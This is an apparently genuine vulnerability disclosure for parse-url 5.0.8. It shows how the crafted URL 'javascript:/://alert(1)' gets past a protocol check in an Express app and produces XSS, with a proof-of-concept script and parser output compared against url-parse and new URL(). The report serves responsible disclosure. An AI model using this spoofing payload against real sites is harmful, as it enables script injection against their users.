Cross Site Scripting via Improper Input Validation in ionicabizau/parse-url
Reported on
Jun 11th 2022
Description
The parse-url The 5.0.8 version of the parser does not check ://
character between protocols. This causes spoofing of the javascript protocol itself. Additionally, protocol spoofing does not occur in url-parse, new URL(), and url.parse() other than parse-url.
Proof of Concept
const parseUrl = require("parse-url");
const express = require('express');
const app = express();
parsed = parseUrl("javascript:/://alert(1)");
console.log(parsed);
app.get('/', (req, res) => {
if (parsed.protocol !== "javascript") {
res.send("<a href=\'" + parsed.href + "\'>CLICK ME!</a>")
}
})
app.listen(9999);
In general, the above express code forbids the javascript protocol. However, you can spoof this using the ://
character
output console.log(parsed);
{
protocols: [ 'javascript:/' ],
protocol: 'javascript:/',
port: null,
resource: 'alert(1)',
user: '',
pathname: '',
hash: '',
search: '',
href: 'javascript:/://alert(1)',
query: [Object: null prototype] {}
}
output : document in browser
<a href="javascript:/://alert(1)">CLICK ME!</a>
Other module stability
~/Desktop/npm-research/test
❯ node -e "const parser = require('url-parse');console.log(parser('javascript:/://alert()'))"
{
slashes: false,
protocol: 'javascript:',
hash: '',
query: '',
pathname: '/://alert()',
auth: '',
host: '',
port: '',
hostname: '',
password: '',
username: '',
origin: 'null',
href: 'javascript:/://alert()'
}
~/Desktop/npm-research/test
❯ node -e 'console.log(new URL("javascript:/://alert()"))'
URL {
href: 'javascript:/://alert()',
origin: 'null',
protocol: 'javascript:',
username: '',
password: '',
host: '',
hostname: '',
port: '',
pathname: '/://alert()',
search: '',
searchParams: URLSearchParams {},
hash: ''
}
In the two famous modules, javascript spoofing does not occur, so XSS does not occur.
Impact
Through this vulnerability, an attacker is capable to execute malicious scripts.
Hi there! Sorry for the late reply and thank you for this report. I am working on fixing this.